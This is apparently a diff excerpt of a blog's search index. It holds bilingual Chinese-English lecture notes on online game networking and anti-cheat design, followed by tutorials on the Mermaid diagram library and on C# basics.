      请求服务发现服务按服务类型查询所有值并监视它们

    webp

    Service Discovery - Health Check

    服务发现-健康检查

    • Notify the Gateway of Server B’s failure when Server Instance B’s heartbeat times out

      当服务器实例 B 心跳超时时,通知网关服务器 B 发生故障

    webp

    Bandwidth Optimization

    带宽优化

    Why Bandwidth Matters

    为什么带宽很重要

    • Usage-based billing: e.g. mobile, cloud service

      基于使用量的计费:例如移动、云服务

    • Latency increased by bandwidth: packet splitting/drop

      延迟随带宽增加:数据包拆分/丢弃

    • Connection drops due to message overflow

      消息溢出导致连接中断

    Calculate Bandwidth

    计算带宽

    Affecting factors

    影响因素

    • n = player numbers 玩家数量
    • f = update frequency 更新频率
    • s = size of game state 游戏状态大小

    webp

    Data transfer per second

    每秒数据传输

    • Server 服务器:$O(n\cdot s\cdot f)$

    • Client (downstream) 客户端(下游):$O(s\cdot f)$

    • Client (upstream) 客户端(上游):$O(f)$

    webp

    Data Compression

    数据压缩

    • There are a lot of floating point numbers in the game synchronization data, such as position, rotation, speed, etc.

      游戏同步数据中有很多浮点数,如位置、旋转、速度等。

    • Choosing the right floating-point precision can save a lot of bandwidth

      选择正确的浮点精度可以节省大量带宽。

      • e.g. When representing human running speed, only half precision is required

        例如,在表示人类跑步速度时,只需要一半的精度

    webp

    • When representing player position, the player will only move within a certain range due to player speed limitations

      代表玩家位置时,由于玩家速度限制,玩家只能在一定范围内移动

    • We can divide the map into different small pieces and use the relative position to represent the player’s position, which can reduce the precision of the floating point number of the synchronization position

      我们可以将地图分成不同的小块,并使用相对位置来表示玩家的位置,这会降低同步位置浮点数的精度

    webp

    Object Relevance

    对象相关性

    • The player will be informed of state updates

      玩家将收到状态更新的通知

    • Usually, the ones player can see & interact

      通常,玩家可以看到并互动

    • Easiest implementation: all objects relevant to all clients (for small player numbers): $O(n^2)$

      最简单的实现:所有对象与所有客户端相关(适用于玩家数量较少时):$O(n^2)$

    • Limiting factor for max concurrent players

      最大并发玩家的限制因素

    webp

    Relevance - Static Zones

    相关性-静态区域

    • Distribute players into different zones

      将玩家分配到不同的区域

    • Players are relevant in the same zone

      玩家在同一区域内具有相关性

    • Reduce bandwidth waste

      减少带宽浪费

    webp

    Relevance - Area of Interest (AOI)

    相关性-关注领域(AOI)

    • The area within which objects are relevant to Player/NPC

      对象与玩家 / NPC 相关的区域

    • Only see & interact with objects within range

      仅查看范围内的对象并与之交互

    • Remove unnecessary network data

      删除不必要的网络数据

    webp

    AOI -Direct Range-Query

    AOI - 直接范围查询

    • $\sqrt{(x_{player}-x_i)^2+(y_{player}-y_i)^2}\le r_{aoi}$

    • Simple to implement 易于实施

    • Time complexity 时间复杂度: $O(n^2)$

    • Not suitable for MMOG, e.g. 1000 players in one zone, 20 ticks/s

      不适合 MMOG,例如一个区域有 1000 名玩家、每秒 20 个 tick

      1000 x 1000 x 20 = 20,000,000 distance computations per second

      1000 x 1000 x 20 = 每秒 2000 万次距离计算

    webp

    AOI - Spatial-Grid

    AOI - 空间网格

    Mapping Entities

    映射实体

    • Map entity $(x, y)$ → grid $N$

      映射实体$(x, y)$ → 网格 $N$

    • Relevant entities in the grids around current player’s grid

      当前玩家网格周围网格中的相关实体

    • Player’s AOI list can be cached

      玩家的 AOI 列表可以缓存
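    A minimal C++ sketch of the grid query (the cell size and the 3x3 neighborhood assume the AOI radius is at most one cell):

    #include <cstdint>
    #include <unordered_map>
    #include <unordered_set>
    #include <vector>

    struct Grid {
        float cell = 10.0f;  // cell size, chosen close to the AOI radius
        std::unordered_map<int64_t, std::unordered_set<int>> cells;

        int64_t key(int cx, int cy) const { return (int64_t(cx) << 32) ^ uint32_t(cy); }

        void insert(int id, float x, float y) {
            cells[key(int(x / cell), int(y / cell))].insert(id);
        }

        // Gather entities in the 3x3 cells around the player's cell.
        std::vector<int> query(float x, float y) const {
            std::vector<int> out;
            int cx = int(x / cell), cy = int(y / cell);
            for (int dx = -1; dx <= 1; ++dx)
                for (int dy = -1; dy <= 1; ++dy) {
                    auto it = cells.find(key(cx + dx, cy + dy));
                    if (it != cells.end())
                        out.insert(out.end(), it->second.begin(), it->second.end());
                }
            return out;
        }
    };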

    webp

    Events

    事件

    Enter

    进入

    • Add entities to the observation (observed) list

      将实体添加到观察(被观察)列表

    Leave

    离开

    • Remove entities from observation (observed) list

      从观察(已观察)列表中删除实体

    webp

    Pros and Cons

    优点和缺点

    Pros

    • Fast query time $O(1)$

      快速查询时间 $O(1)$

    Cons

    • Small grid: high memory cost

      小网格:内存成本高

    • Large grid: high CPU cost

      大网格:CPU 成本高

    • Object with varying AOI radius?

      具有不同 AOI 半径的物体?

    webp

    AOI - Orthogonal Linked-list

    AOI - 正交链表

    • Game entities in double linked-list

      双链表中的游戏实体

      • xlist, ylist

      • ascending order

        升序

    • Less Objects to traverse

      需要遍历的对象更少

    webp

    Traverse entities

    遍历实体

    • Within aoi radius

      aoi 半径内

    • Left/right direction

      左 / 右方向

    • For both x/y lists

      对于 x/y 两个列表

    webp

    Better Approach - Range Trigger

    更好的方法-范围触发

    • Entity move → trigger move

      实体移动 → 触发移动

    • Compare with trigger

      与触发器比较

    • Event driven

      事件驱动

    webp

    Pros

    • Memory efficient

      内存效率高

    • Varying AOI radius

      可变 AOI 半径

    Cons

    • New object insertion cost $O(n)$

      新对象插入成本 $O(n)$

    • Not Suitable when entities move large distance frequently

      当实体频繁移动远距离时不适用

    webp

    AOI - Potentially Visible Set (PVS)

    AOI - 潜在可见集(PVS)

    • Set of potentially visible areas

      一组潜在可见区域

    • Can be calculated offline

      可以离线计算

    • Determine relevant objects from PVS

      从 PVS 中确定相关对象

    • e.g. Racing game: fast-moving car

      例如赛车游戏:快速行驶的汽车

    webp

    Varying Update Frequency by Player Position

    根据玩家位置改变更新频率

    • Distance-based update frequency

      基于距离的更新频率

    • Only closer objects are interactable

      只有较近的对象是可交互的

    • Distance ↑ → f ↓ → bandwidth ↓

      距离 ↑ → f ↓ → 带宽 ↓

    webp

    Cheating Kills Online Games

    作弊会毁掉网络游戏

    How likely, if at all, would you be to stop playing a multiplayer game online if you thought other players were cheating to gain an unfair advantage?

    如果你认为其他玩家作弊以获得不公平的优势,你有多大可能停止玩在线多人游戏?

    Region: Very likely / Fairly likely / Not very likely / Not likely at all / Don’t know
    Global: 29% / 48% / 15% / 4% / 5%
    China: 25% / 56% / 16% / 2% / 1%
    Germany: 30% / 36% / 17% / 8% / 8%
    Japan: 26% / 49% / 16% / 2% / 7%
    South Korea: 27% / 59% / 11% / 1% / 1%
    UK: 33% / 39% / 12% / 6% / 10%
    US: 37% / 32% / 15% / 7% / 8%

    77% of players will likely stop playing online games when other players are cheating, according to the survey by Irdeto.

    爱迪德的调查显示,当其他玩家作弊时,77% 的玩家可能会停止玩网络游戏。

    Millions of Ways of Cheating

    数百万种作弊方式

    Game code modifications

    游戏代码修改

    • Modify or read memory data

      修改或读取内存数据

    • Crack client

      破解客户端

    System software invoke

    系统软件调用

    • D3D Render Hook

      D3D 渲染挂钩

    • Simulate mouse and keyboard operations

      模拟鼠标和键盘操作

    Net Packet interception

    网络数据包拦截

    • Send fake packets

      发送虚假数据包

    • Modify packet data

      修改数据包

    webp

    Obfuscating Memory

    混淆内存

    • A cheater might be able to get the location of the player coordinates in the memory and move the character ignoring the game rules, such as passing the wall

      作弊者可能能够获得玩家在内存中的坐标位置,并忽略游戏规则移动角色,例如通过墙壁

    • Furthermore, the cheater can utilize the location of these values to map out even larger data structures in the memory, such as the player object itself

      此外,作弊者可以利用这些值的位置在内存中绘制出更大的数据结构,例如玩家对象本身

    webp

Executable Packers

• The game's core logic can be recovered by reverse engineering

• Players can crack the game by analyzing the code, finding loopholes, making plug-ins, etc.

• The packer obfuscates the source program and adds decompression code

• The decompression code executes first, and the source program is decrypted in memory

Verifying Local Files by Hashing

• Ensure that the game files have not been modified

• For example, a cheater could modify the wall textures to be transparent so all enemies could be seen through the walls

• The cheater could also adjust the lighting to make enemies easier to see
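A minimal sketch of such a check using the standard SHA256 class (the file path and expected digest are placeholders):

using System;
using System.IO;
using System.Security.Cryptography;

static class FileIntegrity
{
    // Compare the SHA-256 of a local file against an expected digest (hex string).
    public static bool Verify(string path, string expectedHex)
    {
        using var sha = SHA256.Create();
        using var stream = File.OpenRead(path);
        byte[] digest = sha.ComputeHash(stream);
        return Convert.ToHexString(digest).Equals(expectedHex, StringComparison.OrdinalIgnoreCase);
    }
}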

Packet Interception and Manipulation

• When the data is not encrypted, the player can reconstruct game logic from the packet data without even starting the game

• Such cheat programs often become money-making tools, which seriously reduce the game's overall profit

Encrypt the Network Traffic

Two kinds of algorithms

• Symmetric-key algorithm

  • Obfuscate and restore data with the same key

  • Fast and efficient

Asymmetric encryption

• Encryption and decryption use different keys

• Slow; only used for encrypting critical data

• Distribute the symmetric key securely using asymmetric encryption

• Transfer data using the symmetric encryption key
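A minimal sketch of this hybrid scheme with the standard RSA and Aes classes (assumes .NET 6+ for EncryptCbc/DecryptCbc; a real protocol would also transmit the IV, use fresh nonces, and authenticate the ciphertext):

using System;
using System.Security.Cryptography;

static class HybridCrypto
{
    public static void Demo()
    {
        using var rsa = RSA.Create(2048);   // server key pair
        using var aes = Aes.Create();       // client session key

        // Client: wrap the AES session key with the server's public key.
        byte[] wrappedKey = rsa.Encrypt(aes.Key, RSAEncryptionPadding.OaepSHA256);

        // Client: encrypt the payload with the fast symmetric key.
        byte[] payload = System.Text.Encoding.UTF8.GetBytes("move x=1 y=2");
        byte[] cipher = aes.EncryptCbc(payload, aes.IV);

        // Server: unwrap the session key, then decrypt the payload
        // (the IV is assumed to be sent alongside the ciphertext).
        byte[] sessionKey = rsa.Decrypt(wrappedKey, RSAEncryptionPadding.OaepSHA256);
        using var serverAes = Aes.Create();
        serverAes.Key = sessionKey;
        byte[] plain = serverAes.DecryptCbc(cipher, aes.IV);
        Console.WriteLine(System.Text.Encoding.UTF8.GetString(plain));
    }
}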

System Software Invoke

• Modify the DirectX kernel and change the execution flow of the rendering function

• Can force the rendering engine to modify the occlusion relationship

• See the movement of enemies behind walls

Valve Anti-Cheat and Easy Anti-Cheat

• Detect malicious behavior caused by any file conflicts while interacting with the game

• Stop the player from playing the game at all

• Prevent any illegal modifications and configuration changes that enable the use of exploits in a game

AI Cheat

• All platforms

• No code modification required

• Independent from the game

• Game screen

• Target detection

• Move cursor

• Fire

Rich AI Middleware

• Real-time object detection: YOLO v5, v7…

• Skeleton-based action recognition

Counter-Strike: Overwatch

• The system is based on other players reviewing footage from players suspected of cheating

• Many reviewers look at the same cases, and the majority decides whether the suspect was cheating

Passing judgement after reviewing evidence in Counter-Strike: Global Offensive's Overwatch system

Statistic-based System

• Collect the user's game information, such as win rate and critical hit rate

• Compare against the player's own historical data, threshold rules, or other players' reports to flag players

• Check manually to confirm whether they cheat

Detecting Known Cheat Programs

• A proper anti-cheat program should have a way to scan the user's computer for known cheating programs based on various signatures

• The simplest method can simply entail comparing hashes or process names
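A minimal sketch of the process-name variant (the blocklist names are placeholders):

using System;
using System.Diagnostics;
using System.Linq;

static class KnownCheatScan
{
    static readonly string[] Blocklist = { "example_aimbot", "example_wallhack" };

    // Compare running process names against a known-cheat blocklist.
    public static bool AnyKnownCheatRunning() =>
        Process.GetProcesses()
               .Any(p => Blocklist.Contains(p.ProcessName, StringComparer.OrdinalIgnoreCase));
}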

Build a Scalable World

Scalable Game Servers

Zoning

• Distribute large player numbers across a large world

• Distribution might be uneven

Instancing

• Run a large number of game areas independently in parallel

• Reduce congestion/competition

Replication

• Allows high user density

• E.g. high-density PVP games

Zoning - Seamless Zones

• Players are reasonably distributed in a large world

• The client only connects to one responsible server

• Cross border: automatically transfer the client to another server

Zone Border

Smooth experience:

• Border width >= max AOI radius

But how do entities on either side interact?

Zone Border - Entities

Active Entity

• Resides in the connected zone server (the authority)

• Has a ghost agent in other zones

• Can see ghost entities in another zone

Ghost Entity

• Also called a shadow entity

• An agent entity owned by another zone

• Receives updates from the original entity

Cross Border: A -> B

1. Before move

   • An active entity in zone A

2. Near boundary (A)

   • Active in A; ghost in B

3. At boundary

   • The entity is transferred to zone B

4. Near boundary (B)

   • Active in B; ghost in A

5. Beyond boundary (B)

   • Removed from zone A

Replication

• Cooperatively process the same world zone

• Entity updates are distributed among servers

• Each server creates its own active entities

• Updates to active entities are automatically replicated to all remaining servers (as ghosts)

Scalable Game Servers - Combination

    References

    Replicate Character Movement

    Lag Mitigation

    MMOG Network Architecture

    Bandwidth Optimization

    Anti-Cheat

    Citation

    ]]>
@@ -1037,7 +1037,7 @@ /posts/Web-Mermaid/ - Resources

Quick start

Automatic mode

Get the file: https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js

Import the file and load it with mermaid.initialize({startOnLoad:true});:

Define a diagram with statements inside <pre class="mermaid"></pre>:

<script type="text/javascript" src="/js/mermaid.min.js"></script>
<script>mermaid.initialize({startOnLoad:true});</script>
<pre class="mermaid">
graph TD;
A-->B;
A-->C;
B-->D;
C-->D;
</pre>

More syntax is in the official docs. This tool draws diagrams with a fairly concise syntax. (It does feel slow, though…)

Manual mode

用法 | Mermaid 中文网 (nodejs.cn) describes how to use mermaid.min.js to convert a mermaid-syntax string into an SVG string and generate the DOM.

<script type="text/javascript" src="/js/mermaid.min.js"></script>
<script>mermaid.initialize({startOnLoad:false}); // startOnLoad should be false, though true seems to work too…</script>

<script>
// Example of using the render function
const drawDiagram = async function (graphDefinition, id) {
// convert to SVG markup
const { svg } = await mermaid.render('graphDiv', graphDefinition);
const outputContainer = document.getElementById(id);
// insert the HTML into the container
outputContainer.innerHTML = svg;
};
</script>

<div id="output-container"></div>

<script type="module">
await drawDiagram(`
graph TD;
A-->B;
A-->C;
B-->D;
C-->D;
`, 'output-container');
</script>

Written this way, rendering feels much faster… not sure why.

Hexo plugin

Hexo has a plugin for this: webappdevelp/hexo-filter-mermaid-diagrams: mermaid diagrams for hexo (github.com)

Install it!

npm install --save hexo-filter-mermaid-diagrams

The plugin works by taking Markdown like this:

```mermaid
graph TD;
A-->B;
A-->C;
B-->D;
C-->D;
```

and rendering it as:

<pre class="mermaid">graph TD;
A--&gt;B;
A--&gt;C;
B--&gt;D;
C--&gt;D;</pre>

It then calls the relevant functions itself to do the rendering.

]]>
@@ -1089,7 +1089,7 @@ /posts/PL-RUNOOB-CSharp/ - Main Text

Basic Syntax

Hello world

In VS, create a Console App (.NET Framework).

Let's start with Hello World!

using System;
namespace HelloWorldApplication
{
/* class name: HelloWorld */
class HelloWorld
{
/* Main method */
static void Main(string[] args)
{
/* my first C# program */
Console.WriteLine("Hello World!");
Console.ReadKey();
}
}
}

C# Environment

C# is part of the .NET framework and is used to write .NET applications.

Unity uses the open-source .NET platform so that applications created with Unity can run on a wide variety of hardware configurations.

The .NET framework is an innovative platform that helps you write the following kinds of applications:

• Windows applications
• Web applications
• Web services

C# Program Structure

A C# program mainly consists of the following parts:

• Namespace declaration
• A class
• Class methods
• Class attributes
• A Main method
• Statements & expressions
• Comments
using System;  // The using keyword includes the System namespace in the program.
namespace HelloWorldApplication // A namespace contains a collection of classes; it helps organize code, prevents name clashes, and may be omitted here.
{
class HelloWorld // C# is fully object-oriented, so executable code must live inside a class
{
static void Main(string[] args) // The Main method is the entry point of every C# program; it states what the class does when executed.
{
/* my first C# program */
Console.WriteLine("Hello World");
Console.ReadKey(); // For VS.NET users: waits for a key press so the console does not flash open and close when launched from Visual Studio .NET. In VS2022 you can also start with Ctrl + F5 to keep the console open.
}
}
}

C# Basic Syntax

C# is an object-oriented programming language. In object-oriented program design, a program consists of various objects that interact with one another. Objects of the same kind usually share the same type, i.e. belong to the same class.

For example, take a Rectangle object. It has length and width attributes. Depending on the design, it may need to accept these attribute values, compute the area, and display details.

    using System;
    namespace RectangleApplication
    {
    class Rectangle
    {
    // 成员变量
    double length;
    double width;
    public void Acceptdetails()
    {
    length = 4.5;
    width = 3.5;
    }
    public double GetArea()
    {
    return length * width;
    }
    public void Display()
    {
    Console.WriteLine("Length: {0}", length);
    Console.WriteLine("Width: {0}", width);
    Console.WriteLine("Area: {0}", GetArea());
    }
    }

    class ExecuteRectangle
    {
    static void Main(string[] args)
    {
    Rectangle r = new Rectangle();
    r.Acceptdetails();
    r.Display();
    Console.ReadLine();
    }
    }
    }
    Length: 4.5
    Width: 3.5
    Area: 15.75

C# Data Types

In C#, variables fall into the following types:

• Value types
• Reference types
• Pointer types

Value types

    using System;

    namespace ConsoleApplication1
    {
    class Program
    {
    static void Main(string[] args)
    {
    PrintValueTypeRange();
    }
    static void PrintValueTypeRange()
    {
    Console.WriteLine("int 类型的最大值是:{0}", int.MaxValue); // 32 位有符号整数类型
    Console.WriteLine("uint 类型的最大值是:{0}", uint.MaxValue); // 32 位无符号整数类型
    Console.WriteLine("byte 类型的最大值是:{0}", byte.MaxValue); // 8 位无符号整数
    Console.WriteLine("sbyte 类型的最大值是:{0}", sbyte.MaxValue); // 8 位有符号整数类型
    Console.WriteLine("short 类型的最大值是:{0}", short.MaxValue); // 16 位有符号整数类型
    Console.WriteLine("ushort 类型的最大值是:{0}", ushort.MaxValue); // 16 位无符号整数类型
    Console.WriteLine("long 类型的最大值是:{0}", long.MaxValue); // 64 位有符号整数类型
    Console.WriteLine("ulong 类型的最大值是:{0}", ulong.MaxValue); // 64 位无符号整数类型
    Console.WriteLine("float 类型的最大值是:{0}", float.MaxValue); // 32 位单精度浮点型
    Console.WriteLine("double 类型的最大值是:{0}", double.MaxValue); // 64 位双精度浮点型
    Console.WriteLine("decimal 类型的最大值是:{0}", decimal.MaxValue); // 128 位精确的十进制值,28-29 有效位数
    Console.WriteLine("int 类型的最小值是:{0}", int.MinValue);
    Console.WriteLine("uint 类型的最小值是:{0}", uint.MinValue);
    Console.WriteLine("byte 类型的最小值是:{0}", byte.MinValue);
    Console.WriteLine("sbyte 类型的最小值是:{0}", sbyte.MinValue);
    Console.WriteLine("short 类型的最小值是:{0}", short.MinValue);
    Console.WriteLine("ushort 类型的最小值是:{0}", ushort.MinValue);
    Console.WriteLine("long 类型的最小值是:{0}", long.MinValue);
    Console.WriteLine("ulong 类型的最小值是:{0}", ulong.MinValue);
    Console.WriteLine("float 类型的最小值是:{0}", float.MinValue);
    Console.WriteLine("double 类型的最小值是:{0}", double.MinValue);
    Console.WriteLine("decimal 类型的最小值是:{0}", decimal.MinValue);
    Console.ReadKey();
    }
    }
    }
    int      类型的最大值是:2147483647
    uint 类型的最大值是:4294967295
    byte 类型的最大值是:255
    sbyte 类型的最大值是:127
    short 类型的最大值是:32767
    ushort 类型的最大值是:65535
    long 类型的最大值是:9223372036854775807
    ulong 类型的最大值是:18446744073709551615
    float 类型的最大值是:3.402823E+38
    double 类型的最大值是:1.79769313486232E+308
    decimal 类型的最大值是:79228162514264337593543950335
    int 类型的最小值是:-2147483648
    uint 类型的最小值是:0
    byte 类型的最小值是:0
    sbyte 类型的最小值是:-128
    short 类型的最小值是:-32768
    ushort 类型的最小值是:0
    long 类型的最小值是:-9223372036854775808
    ulong 类型的最小值是:0
    float 类型的最小值是:-3.402823E+38
    double 类型的最小值是:-1.79769313486232E+308
    decimal 类型的最小值是:-79228162514264337593543950335

Decimal is not a floating-point data type. The Decimal structure holds a binary integer value together with a sign bit and an integer scaling factor that specifies the fractional part of the value. In memory, a Decimal number is therefore represented more precisely than the floating-point types (Single and Double). The Decimal type is for storing exact decimal values; compared with floating-point types such as Float and Double, it offers higher precision and avoids floating-point rounding errors.

To get the exact storage size of a type or variable on a particular platform, use the sizeof operator. The expression sizeof(type) yields the storage size of the object or type in bytes.

    using System;

    namespace DataTypeApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    Console.WriteLine("Size of bool: {0}", sizeof(bool));
    Console.WriteLine("Size of byte: {0}", sizeof(byte));
    Console.WriteLine("Size of sbyte: {0}", sizeof(sbyte));
    Console.WriteLine("Size of int: {0}", sizeof(int));
    Console.WriteLine("Size of float: {0}", sizeof(float));
    Console.WriteLine("Size of double: {0}", sizeof(double));
    Console.WriteLine("Size of decimal: {0}", sizeof(decimal));
    Console.ReadLine();
    }
    }
    }
    Size of bool: 1
    Size of byte: 1
    Size of sbyte: 1
    Size of int: 4
    Size of float: 4
    Size of double: 8
    Size of decimal: 16

Object Type

The Object type is the ultimate base class of all data types in the C# Common Type System (CTS). Object is an alias for the System.Object class, so an object-typed variable can be assigned a value of any other type (value type, reference type, predefined or user-defined). Before assigning a value, however, a type conversion is needed.

Converting a value type to the object type is called boxing; conversely, converting an object type back to a value type is called unboxing.

using System;

namespace Test
{
class Program
{
static void Main(string[] args)
{
// original value type
int original = 10;

// boxing: the int is boxed into an object
object boxed = original;

// unboxing: the object is unboxed back into an int
int unboxed = (int)boxed;

Console.WriteLine($"Original value: {original}");
Console.WriteLine($"Unboxed value: {unboxed}");
}
}
}
Original value: 10
Unboxed value: 10

Dynamic Type

You can store a value of any type in a dynamic variable. Type checking for these variables happens at run time.

Syntax for declaring a dynamic type:

dynamic d = 20;

The dynamic type is similar to the object type, except that type checking for object variables happens at compile time, while for dynamic variables it happens at run time.

Statically typed languages are also called strongly typed languages: loosely speaking, languages that perform type checking during compilation. As a simple rule of thumb: if a method's return type is complex, var is convenient; but when you clearly know the return type, or it is a simple type, declare it directly with that type, just as we routinely declare return types with string, int, bool, and so on.

The main difference between the var and dynamic keywords is binding time: var is early-bound, while dynamic binds at run time.

var is really syntactic sugar from the compiler: once compiled, the compiler infers the variable's actual type and replaces the declaration with it, exactly as if we had written the actual type ourselves. dynamic compiles to an Object type, and the compiler performs no type checking on dynamic at compile time.
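A tiny illustration of that binding difference (the commented line would be a compile-time error):

using System;

var s = "hello";      // the compiler infers string at compile time
// s = 123;           // compile-time error: s is a string

dynamic d = "hello";  // checked only at run time
d = 123;              // fine: the binding happens at run time
Console.WriteLine(d); // prints 123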

String Type

The String type lets you assign any string value to a variable. It is an alias for the System.String class and derives from the Object type. A String value can be written in two forms: quoted and @quoted.

For example:

string str = "runoob.com";

A C# string can be prefixed with @ (a "verbatim string"), which treats the escape character \ as an ordinary character (similar to Python's raw-string prefix r), for example:

string str = @"C:\Windows";

is equivalent to:

string str = "C:\\Windows";

A @ string may span multiple lines; the newlines and indentation spaces all count toward the string's length.

    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    string str = @"<script type=""text/javascript"">
    <!--
    -->
    </script>";
    Console.WriteLine(str);
    Console.ReadLine();
    }
    }
    }
    <script type="text/javascript">
    <!--
    -->
    </script>

User-defined reference types include class, interface, and delegate. We will discuss them in later chapters.

Pointer types

A pointer type variable stores the memory address of another type. Pointers in C# have the same capabilities as pointers in C or C++.

    type* identifier;
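A minimal sketch (pointers require an unsafe context, i.e. compiling with unsafe blocks enabled):

using System;

class PointerDemo
{
static unsafe void Main()
{
int value = 42;
int* p = &value;       // pointer to a local int
Console.WriteLine(*p); // dereference: prints 42
}
}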

C# Type Conversion

Type conversion in C# comes in two kinds: implicit conversion and explicit conversion (also called casting).

Implicit conversion

Implicit conversions require no code to specify; the compiler performs them automatically.

An implicit conversion converts a smaller-range type to a larger-range type (e.g. from int to long, from float to double). These are C#'s default conversions, performed safely without data loss.

byte b = 10;
int i = b; // implicit conversion, no cast needed

Explicit conversion

Explicit conversion, i.e. casting, must be specified by the programmer in code.

An explicit conversion converts a larger-range type to a smaller-range type, or one object type to another; it requires the cast operator and may cause data loss.

    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    double a = 3.141592653589;
    float b = 3.141592653589f;

    Console.WriteLine(a + "");
    Console.WriteLine((float)a + "");
    Console.WriteLine(b);
    Console.ReadLine();
    }
    }
    }
    3.141592653589
    3.141593
    3.141593

C# Type Conversion Methods

Use the functions of the System.Convert class to perform conversions. They offer a safe way to convert because they can handle null values and throw an exception if the conversion is impossible.

Why doesn't C# have System.Convert.ToFloat()?

It does, but it is called Convert.ToSingle(); float is the C# alias for the type System.Single.

"Single" is the BCL name of the floating-point type; "float" is the alias C# provides. There is a Convert.ToSingle() method, just as there is Convert.ToInt32() rather than Convert.ToInt().


Types such as float and int are merely C# syntactic sugar; in the .NET framework they are Single, Int32, and so on. So "Convert.ToFloat()" is really Convert.ToSingle.

The author of "CLR via C#" recommends never using int, short, float, etc., and instead using the native types Int32, Int16, Single, so that cross-language programming is not confused by the quirks of any particular language. (Fair point; I'll keep using the aliases anyway.)

    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    string a = "3.1415926535";
    float b = Convert.ToSingle(a);
    Single c = Convert.ToSingle(a);
    double d = Convert.ToDouble(a);

    Console.WriteLine(a);
    Console.WriteLine(b);
    Console.WriteLine(c);
    Console.WriteLine(d);
    Console.ReadLine();
    }
    }
    }
    3.1415926535
    3.141593
    3.141593
    3.1415926535

.ToString() converts a given type to a string; you can of course also append + "".

    using System;

    namespace TypeConversionApplication
    {
    class StringConversion
    {
    static void Main(string[] args)
    {
    int i = 75;
    float f = 53.005f;
    double d = 2345.7652;
    bool b = true;
    Console.WriteLine(i.ToString());
    Console.WriteLine(f.ToString());
    Console.WriteLine(d.ToString());
    Console.WriteLine(b.ToString());
    Console.ReadKey();
    }
    }
    }

Using the Parse method

Parse converts a string to the corresponding numeric type and throws an exception if the conversion fails.

string str = "123.45";
double d = double.Parse(str);

Using the TryParse method

TryParse is similar to Parse, but instead of throwing it returns a boolean indicating whether the conversion succeeded.

    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    string str = "123.45";
    double d;
    bool success = double.TryParse(str, out d);

    if (success)
    {
    Console.WriteLine("转换成功: " + d);
    }
    else
    {
    Console.WriteLine("转换失败");
    }

    int i;
    success = int.TryParse(str, out i);

    if (success)
    {
    Console.WriteLine("转换成功: " + i);
    }
    else
    {
    Console.WriteLine("转换失败");
    }

    Console.ReadKey();
    }
    }
    }
    转换成功: 123.45
    转换失败

Custom type conversions

C# also lets you define custom conversion operators by using the implicit or explicit keyword in a type.

    using System;

    public class Fahrenheit
    {
    public double Degrees { get; set; }

    public Fahrenheit(double degrees)
    {
    Degrees = degrees;
    }

// implicit conversion from Fahrenheit to Celsius
    public static implicit operator Celsius(Fahrenheit f)
    {
    return new Celsius((f.Degrees - 32) / 1.8);
    }

// explicit conversion from Celsius to Fahrenheit
    public static explicit operator Fahrenheit(Celsius c)
    {
    return new Fahrenheit(32 + c.Degrees * 1.8);
    }
    }

    public class Celsius
    {
    public double Degrees { get; set; }

    public Celsius(double degrees)
    {
    Degrees = degrees;
    }
    }

    public class Program
    {
    public static void Main()
    {
    Celsius c = new Celsius(37);
    Fahrenheit f = new Fahrenheit(98.6);
Celsius c2 = f; // uses the implicit conversion
Fahrenheit f2 = (Fahrenheit)c; // uses the explicit conversion

    Console.WriteLine(c.Degrees + "°C");
    Console.WriteLine(f.Degrees + "°F");
    Console.WriteLine(c2.Degrees + "°C");
    Console.WriteLine(f2.Degrees + "°F");

    Console.ReadKey();
    }
    }

implicit defines an implicit conversion.

explicit defines an explicit conversion.

The operator keyword is mainly used for operator overloading; it can also define custom type conversions in a class or struct.

    37°C
    98.6°F
    37°C
    98.6°F

C# Variables

A variable is nothing more than a name for a storage area that the program can manipulate.

Variable definitions in C#

In C#, variable names must follow a few rules:

• A variable name may contain letters, digits, and underscores.
• A variable name must start with a letter or an underscore.
• Variable names are case-sensitive.
• Avoid using C# keywords as variable names.

Variable initialization in C#

Initializing variables properly is a good programming habit; otherwise a program may sometimes produce unexpected results.

    using System;

    namespace VariableDefinition
    {
    class Program
    {
    static void Main(string[] args)
    {
    short a;
    int b;
    double c;

/* actual initialization */
    a = 10;
    b = 20;
    c = a + b;
    Console.WriteLine("a = {0}, b = {1}, c = {2}", a, b, c);
    Console.ReadLine();
    }
    }
    }
    a = 10, b = 20, c = 30

Accepting values from the user

The Console class in the System namespace provides the ReadLine() function, which receives input from the user and stores it in a variable. (Similar to scanf().)

    using System;

    namespace VariableDefinition
    {
    class Program
    {
    static void Main(string[] args)
    {
    int num;
    num = Convert.ToInt32(Console.ReadLine());
    Console.WriteLine(num);
    Console.ReadLine();
    }
    }
    }

Lvalues and Rvalues in C#

Two kinds of expressions in C#:

1. lvalue: an lvalue expression may appear on either the left or the right side of an assignment.
2. rvalue: an rvalue expression may appear only on the right side of an assignment, never on the left.

Variables are lvalues, so they may appear on the left of an assignment. Literals are rvalues, so they cannot be assigned to and may not appear on the left. The following is a valid statement:

int g = 20;

The following is invalid and produces a compile-time error:

10 = 20;

C# Variable Scope

In C#, a variable's scope defines its visibility and lifetime.

A variable's scope is usually delimited by a code block enclosed in braces {}.

Member variable scope

C# is fully object-oriented, so a "global" variable can live at most at class level:

class MyClass
{
int memberVar = 30; // member variable, visible throughout the class
    }

Static variable scope

static variables are declared at class level, but their scope is likewise limited to the defining class.

class MyClass
{
static int staticVar = 40; // static variable, visible throughout the class
    }

Loop variable scope

A loop variable declared in a for loop is visible within the loop body.

for (int i = 0; i < 5; i++)
{
// i is visible inside the loop body
}
// i is not visible here

Overall, variable scope helps manage visibility and lifetime, ensures variables are used within their valid range, and helps prevent naming conflicts.

C# Constants

Constants can be treated like regular variables, except that their values cannot be modified after definition.

Integer constants

Integer constants can be decimal, octal, or hexadecimal.

The prefix specifies the base:

• 0x or 0X means hexadecimal
• 0 means octal
• no prefix means decimal

Integer constants can also take a suffix, a combination of U and L, where:

• U and L stand for unsigned and long respectively.

  Suffixes may be upper or lower case, and multiple suffixes may be combined in any order.

    using System;

    namespace VariableDefinition
    {
    class Program
    {
    static void Main(string[] args)
    {
    var num = 0xFeeL;
    Console.WriteLine(num);
    Console.ReadLine();
    }
    }
    }
    4078

Floating-point constants

A floating-point constant consists of an integer part, a decimal point, a fractional part, and an exponent part. You can write floating-point constants in decimal or exponent form.

